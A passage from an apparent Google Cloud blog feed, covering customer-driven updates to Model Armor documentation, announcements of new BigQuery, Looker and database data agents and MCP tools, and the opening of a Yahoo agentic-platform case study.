&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By observing the development workflow firsthand, we identified four critical friction points:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Search-first workflows:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Developers rarely navigate through documentation hierarchies; instead, they rely on search to jump straight to specific code examples. A lack of comprehensive, copy-pasteable snippets for common use cases—like PII redaction—was a primary point of friction.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Balancing confidence levels:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Finding the right balance between comprehensive threat detection and minimizing disruptive false positives proved challenging. For instance, using aggressive settings like "low and above" often caused a high volume of false positives that interrupted legitimate customer support flows.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;The need for granular guidance:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; While the core concepts of Model Armor were understood, developers needed more detail on how different enforcement methods function in practice to balance security with usability.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Integration roadblocks (the 403 error):&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; When integrating Model Armor with other services like &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Apigee&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, developers frequently encountered &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;403 PERMISSION_DENIED&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; errors. This indicated a gap in our documentation regarding necessary cross-service IAM roles and permissions.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;Turning insights into action&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The insights gained from this partnership were immediately channeled into a comprehensive overhaul of Model Armor’s documentation and guidance:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Tested, copy-pasteable code samples:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We have added numerous tested, ready-to-use code samples throughout the documentation to support search-first workflows.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;The confidence level matrix:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We introduced a new technical reference to help users understand the trade-offs between different filter levels. We now explicitly recommend "High" or "Medium" thresholds for general content to minimize false positives, reserving "Low and above" for high-security threats like prompt injection and jailbreak detection.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Explicit integration guides:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We updated our integration guides, with a focus on &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Apigee, Gemini Enterprise Agent Platform, and GKE&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. These now clearly outline the specific IAM roles required (&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;such as &lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;code&gt;&lt;span style="vertical-align: baseline;"&gt;roles/modelarmor.user&lt;/span&gt;&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) to ensure smooth, error-free deployments.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Deeper technical documentation:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We have enhanced the documentation to provide in-depth explanations of enforcement methods and their real-world applications.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;The power of partnership&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Getting "in the room" with our customers allowed us to bridge the gap between technical accuracy and operational utility. This journey of co-innovation ensures that Model Armor serves as a genuine catalyst for your success. We encourage you to explore the updated documentation and share your feedback as we continue to build the most secure platform for your GenAI workloads.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Get started:&lt;/strong&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Explore the updated &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/model-armor/overview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Model Armor documentation&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt; &lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/how-customer-collaboration-is-shaping-the-future-of-genai-security-with-model-armor/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-16T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://www.googlecloudpresscorner.com/2026-06-16-Ineffable-Intelligence-Selects-Google-Cloud-To-Power-Its-Superintelligence-Mission</id>
    <title>Ineffable Intelligence Selects Google Cloud To Power Its Superintelligence Mission</title>
    <updated>2026-06-16T07:00:00+00:00</updated>
    <link href="https://www.googlecloudpresscorner.com/2026-06-16-Ineffable-Intelligence-Selects-Google-Cloud-To-Power-Its-Superintelligence-Mission" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-16T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/data-analytics/new-data-agents-across-the-agentic-data-cloud/</id>
    <title>What’s new in data agents: Supercharging your AI workflows</title>
    <updated>2026-06-15T17:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The rise of AI agents is fundamentally disrupting applications and analytical systems. Generic AI platforms don't usually have access to the context stored within enterprise databases. This is because traditional data architectures often lack context for agents across the data estate, which can lead to agents being inaccurate. They’re also prone to security gaps due to a lack of granular access controls. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google’s Agentic Data Cloud is an AI-native system of action that includes both operational and analytical systems. By infusing AI across the entire stack — from custom silicon to frontier Gemini models — we provide a deterministic, template-driven developer framework that allows agents to ground their reasoning in real-time enterprise data with near-100% accuracy, as well as unified governance.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Today, we’re making it easier to develop agents, with a whole host of new data agents and tools: for business analysts within Conversational Analytics; for data scientists, engineers, and database admins with a series of Google-built Data Agents that provide greater automation and intelligence; and finally, for developers, with Data Agent tools that help you better integrate with today’s open agentic ecosystem.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;1. Conversational Analytics&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To support developers building agents using natural language, we’re announcing expanded support for Conversational Analytics across Data Cloud.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Conversational Analytics in BigQuery&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/conversational-analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;in preview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, integrates a sophisticated AI reasoning engine directly into BigQuery Studio, helping data and business teams go beyond writing manual SQL, leveraging business context to ground answers using multimodal synthesis and deep-dive research. Agentic workflows, in preview for select customers, automate root-cause analysis, and schedule actions — turning enterprise data into proactive, actionable intelligence. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="1" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/1_M5Wjn2O.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Create agents for faster data insights with Conversational Analytics in BigQuery&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Conversational Analytics in Lakehouse&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/lakehouse/docs/conversational-analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;now in preview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, extends the &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/lakehouse/docs"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Lakehouse&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; unified infrastructure, so users can query distributed data lakes across AWS, Azure, and Google Cloud using natural language. This makes it possible to combine insights across cloud platforms without moving a single byte of data. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Conversational Analytics in &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/gemini/data-agents/conversational-analytics/alloydb"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;, &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/gemini/data-agents/conversational-analytics/spanner"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Spanner&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;, and &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/gemini/data-agents/conversational-analytics/sql-postgres"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud SQL&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, now in preview, supports out-of-the-box conversational AI, making data accessible for everyone. AlloyDB, Spanner, and Cloud SQL users can start natural-language conversations with their databases to gain visibility into their real-time operational data and capture analytical insights.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_YqI8Fra.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Use Conversational Analytics to get answers from your operational data&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Looker Embedded Conversational Analytics&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/business-intelligence/looker-embedded-adds-conversational-analytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;now generally available&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, allows you to embed &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;agents directly into your custom applications and internal workflows via a low-code iframe implementation, making it easier to ship production-ready, conversational AI within any application. Additionally, with the&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/reference/looker-api/latest/methods/ConversationalAnalytics"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Conversational Analytics API in Looker&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;you can create multi-turn conversational workflows that offer AI-powered recommendations, while also verifying and explaining the underlying SQL query. We are also significantly upgrading Looker’s core&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/business-intelligence/looker-conversational-analytics-now-ga/?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Conversational Analytics agent&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;which is already GA, with superior reasoning and semantic grounding, helping to eliminate ambiguity.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="3" src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/3_vDitSbe.gif" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Embed agents directly into your applications for conversational AI&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;2. New data agents&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To help data professionals move from reactive data management to proactive intelligence, and business analysts better interact with their dashboards, we’re announcing a new set of data agents that bring automation, intelligence, and natural language capabilities into their daily workflows. &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Data Engineering Agent, &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/data-engineering-agent-pipelines"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;now generally available&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, automates the heavy lifting of building and maintaining data pipelines. It transforms natural language requirements into optimized SQL or Python code for BigQuery and Dataflow, while proactively identifying and fixing pipeline breaks. By suggesting schema improvements and partitioning strategies, it ensures your data foundation is scalable, reliable, and performance-tuned without manual trial and error.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Data Science Agent, &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/colab-data-science-agent"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;now in preview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, accelerates the path from raw data to production-ready models. It assists data scientists by suggesting relevant features, generating boilerplate notebook code, and automating the technical documentation process. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Database Observability Agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, in preview with select Cloud SQL, AlloyDB, Spanner, and Bigtable customers, proactively monitors database performance and continuously identifies potential issues before they escalate. It then delivers intelligent recommendations and multi-turn remediation workflows for fast, comprehensive troubleshooting and optimization. It provides performance analytics for the entire database fleet, helping you quickly identify performance optimization opportunities across databases.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Database Onboarding Agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, in preview with select customers, takes the guesswork out of database selection and deployment. By evaluating your stated requirements — from simple use case descriptions, to complex enterprise needs — it recommends the best Google Cloud database and guides you through provisioning.&lt;/span&gt;&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Looker Dashboard Agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/conversational-analytics-looker-data-agents-dashboards"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;now in preview,&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; enables conversational interaction with data within dashboards. Users can ask natural language questions and receive context-aware answers within the dashboard. This feature also provides AI-generated summaries that highlight key takeaways and insights from the dashboard. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Conversational Analytics in Gemini Enterprise, &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/create-data-agents#publish-agent-gemini-enterprise"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;now in preview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for Looker, BigQuery, and Lakehouse, brings governed intelligence built by data practitioners directly to business leaders. It serves as a "front door" to the Google Data Cloud, allowing business users to consume agents built in BigQuery, Looker, or Lakehouse without needing to access technical consoles. By publishing these agents from Google Data to Gemini Enterprise, organizations provide a single, grounded interface for precision data exploration and immediate answers to the business users. &lt;/span&gt;&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Data Insights Agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/gemini/enterprise/docs/data-agent"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;now in preview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, provides unified insights into your data assets in Gemini Enterprise, by simultaneously querying structured sources like BigQuery and Snowflake alongside unstructured data like meeting notes and public web info. It functions as a quick-response engine for everyday business users, synthesizing information across the Workspace ecosystem (Docs, Sheets, Drive) and third-party apps like Jira and HubSpot. The agent features rich, interactive visualizations and learns continuously to align with user preferences over time. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Deep Research Agent&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://ai.google.dev/gemini-api/docs/deep-research" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;now in preview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, uses the Knowledge Catalog to solve high-stakes, multi-layered business problems. It moves beyond simple search to build comprehensive research plans that synthesize intelligence from internal documents, BigQuery tables, and the public web. The result is a detailed report with dynamic visualizations and verifiable citations, that respect enterprise privacy and user permissions all the while. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;3. Tools for data agents &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Open-source standards for agentic development provide developers building AI applications and custom agents with a unified framework to access data and tools consistently and securely. Today, we are announcing the following tools to help ground your agentic development initiatives:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Data Agent Kit: &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/data-cloud-extension"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;now in preview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, provides a standardized suite of skills and tools directly within preferred developer environments (IDE/CLI), empowering data practitioners to discover, transform, and action data at scale using the prescriptive guidance from the Agentic Data Cloud capabilities.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Managed MCP Servers for Databases, &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/mcp/manage-mcp-servers"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;now generally available&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for AlloyDB, Spanner, Cloud SQL, Bigtable, and Firestore, fully manages the infrastructure required to connect AI models securely to your data, so you don’t have to host, secure, or scale MCP servers yourself. Now, developers can provide their agents with up-to-date context from across our database portfolio, so that your AI models can reason and act upon your most up-to-date enterprise data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Managed MCP Server for Looker&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://docs.cloud.google.com/looker/docs/mcp"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;now in preview&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, allows any MCP client or agent platform to query Looker's semantic models, extending governed BI insights across third-party applications.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="4" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/4_rcQ0IiI.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Access Looker semantic models through Managed MCP Server&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;MCP Toolbox for Databases 1.0, &lt;/strong&gt;&lt;a href="https://github.com/googleapis/mcp-toolbox" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;now generally available&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, has achieved a major stability milestone, giving you the confidence to build production applications. We also overhauled the documentation, making the platform significantly more approachable for both human developers and autonomous agents.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;QueryData for &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/sql/docs/postgres/data-agent-overview"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Cloud SQL&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;, &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/alloydb/docs/ai/data-agent-overview"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;AlloyDB&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;, and &lt;/strong&gt;&lt;a href="https://docs.cloud.google.com/spanner/docs/data-agent-overview"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Spanner&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;,&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; now in preview, turns natural language questions into database queries. It’s built natively into these databases, and provides near-100% accuracy for natural language to SQL conversions through metadata, query examples, and evals. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Universal Commerce Protocol (UCP) Analytics powered by BigQuery&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, now in preview, enables merchants and developers to stream real-time events from UCP directly into BigQuery (see &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/data-agent-kit/tree/main/ucp-analytics" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;sample&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;). This &lt;/span&gt;&lt;a href="https://developers.google.com/merchant/ucp/guides/bq-storage" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;integration&lt;/span&gt;&lt;/a&gt; &lt;span style="vertical-align: baseline;"&gt;provides out-of-the-box observability for agentic commerce, allowing teams to monitor conversion funnels, track automated checkout performance, and identify system errors. By standardizing these metrics within BigQuery, businesses can bridge the gap between AI-driven transactions and existing business intelligence workflows. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Details on how to access the new agents and tools can be found from each of the documentation links on this page. Data agents are also available through Gemini Enterprise and the Google Cloud console. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/data-analytics/new-data-agents-across-the-agentic-data-cloud/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-15T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/databases/graph-technologies-underpin-yahoo-system-of-action/</id>
    <title>Architecting a trusted agentic platform with graph technologies: A Yahoo case study</title>
    <updated>2026-06-15T16:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As enterprises adopt agentic AI, they need to shift from reactive systems of intelligence to proactive &lt;/span&gt;&lt;a href="https://cloud.google.com/transform/shift-system-of-action-architecting-the-agentic-data-cloud-ai?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;systems of action&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to equip the agents they’re building with the context and performance they need, plus regulator-grade accountability, where every decision is explainable and auditable. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At Google Cloud Next ‘26, we discuss how our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/whats-new-in-the-agentic-data-cloud?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Agentic Data Cloud enables a system of action&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and Yahoo’s digital media buying platform is a compelling example of this vision. Yahoo partnered with Google Cloud to build its Seller Agent digital media buying platform using Google Data Cloud graph technologies. Seller Agent condenses multi-week manual processes into fully governed, live campaigns that can be executed in just seconds. Ultimately, this agentic platform serves as a powerful blueprint for multiple industries, demonstrating that autonomous systems can operate at remarkable speed while remaining strictly accountable.&lt;/span&gt;&lt;/p&gt;
